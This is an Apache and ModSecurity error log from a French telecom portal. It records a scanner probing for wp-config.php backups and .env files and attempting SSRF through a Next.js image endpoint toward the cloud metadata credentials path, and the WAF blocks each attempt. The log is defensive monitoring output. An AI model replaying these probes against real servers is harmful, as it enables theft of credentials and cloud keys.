[Mon May 11 15:23:16.700385 2026] [proxy_fcgi:error] [pid 1319998:tid 1320012] [client 195.178.110.133:3584] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.704741 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZXwAAARM"]
[Mon May 11 15:23:16.704913 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZXwAAARM"]
[Mon May 11 15:23:16.705129 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRFchVQ3tCn0m9OpZXwAAARM"]
[Mon May 11 15:23:16.705266 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRKy-5-wpj6Sx56aY9gAAAAw"]
[Mon May 11 15:23:16.705437 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRKy-5-wpj6Sx56aY9gAAAAw"]
[Mon May 11 15:23:16.705643 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYRKy-5-wpj6Sx56aY9gAAAAw"]
[Mon May 11 15:23:16.706514 2026] [security2:error] [pid 1319998:tid 1320000] [client 195.178.110.133:3636] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRKt2WtvoFr7xvGzUnAAAAIA"]
[Mon May 11 15:23:16.706586 2026] [security2:error] [pid 1319886:tid 1319905] [client 195.178.110.133:3668] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRKy-5-wpj6Sx56aY9wAAAAQ"]
[Mon May 11 15:23:16.706643 2026] [security2:error] [pid 1319998:tid 1320000] [client 195.178.110.133:3636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRKt2WtvoFr7xvGzUnAAAAIA"]
[Mon May 11 15:23:16.706703 2026] [security2:error] [pid 1319886:tid 1319905] [client 195.178.110.133:3668] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRKy-5-wpj6Sx56aY9wAAAAQ"]
[Mon May 11 15:23:16.706838 2026] [security2:error] [pid 1319998:tid 1320000] [client 195.178.110.133:3636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRKt2WtvoFr7xvGzUnAAAAIA"]
[Mon May 11 15:23:16.706886 2026] [security2:error] [pid 1319886:tid 1319905] [client 195.178.110.133:3668] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRKy-5-wpj6Sx56aY9wAAAAQ"]
[Mon May 11 15:23:16.709624 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S_AAAANM"]
[Mon May 11 15:23:16.709748 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S_AAAANM"]
[Mon May 11 15:23:16.709931 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S_AAAANM"]
[Mon May 11 15:23:16.710148 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:3632] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYROJEyNRN152ArOSNJQAAAE4"]
[Mon May 11 15:23:16.710323 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:3632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYROJEyNRN152ArOSNJQAAAE4"]
[Mon May 11 15:23:16.710524 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:3632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYROJEyNRN152ArOSNJQAAAE4"]
[Mon May 11 15:23:16.713097 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYROSQ-m-m0ukSShuCOAAAAUg"]
[Mon May 11 15:23:16.713232 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYROSQ-m-m0ukSShuCOAAAAUg"]
[Mon May 11 15:23:16.713425 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYROSQ-m-m0ukSShuCOAAAAUg"]
[Mon May 11 15:23:16.726003 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRKy-5-wpj6Sx56aY-AAAAAw"]
[Mon May 11 15:23:16.726735 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRKy-5-wpj6Sx56aY-AAAAAw"]
[Mon May 11 15:23:16.726992 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRKy-5-wpj6Sx56aY-AAAAAw"]
[Mon May 11 15:23:16.752930 2026] [proxy_fcgi:error] [pid 1319885:tid 1319892] [client 195.178.110.133:3574] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.755212 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:16.764550 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRKy-5-wpj6Sx56aY_AAAAAw"]
[Mon May 11 15:23:16.765280 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRKy-5-wpj6Sx56aY_AAAAAw"]
[Mon May 11 15:23:16.765528 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRKy-5-wpj6Sx56aY_AAAAAw"]
[Mon May 11 15:23:16.763896 2026] [proxy_fcgi:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.780781 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNLQAAAEg"]
[Mon May 11 15:23:16.780912 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNLQAAAEg"]
[Mon May 11 15:23:16.781094 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSNLQAAAEg"]
[Mon May 11 15:23:16.782960 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRKy-5-wpj6Sx56aY_QAAAAw"]
[Mon May 11 15:23:16.783655 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRKy-5-wpj6Sx56aY_QAAAAw"]
[Mon May 11 15:23:16.783939 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYRKy-5-wpj6Sx56aY_QAAAAw"]
[Mon May 11 15:23:16.804570 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROJEyNRN152ArOSNLgAAAEg"]
[Mon May 11 15:23:16.804704 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROJEyNRN152ArOSNLgAAAEg"]
[Mon May 11 15:23:16.804923 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:3658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYROJEyNRN152ArOSNLgAAAEg"]
[Mon May 11 15:23:16.807177 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:16.830456 2026] [proxy_fcgi:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.832137 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:16.887189 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.887968 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:16.905929 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.912919 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:16.926205 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.937744 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:16.948924 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.962808 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:16.975708 2026] [proxy_fcgi:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] AH01071: Got error 'Primary script unknown'
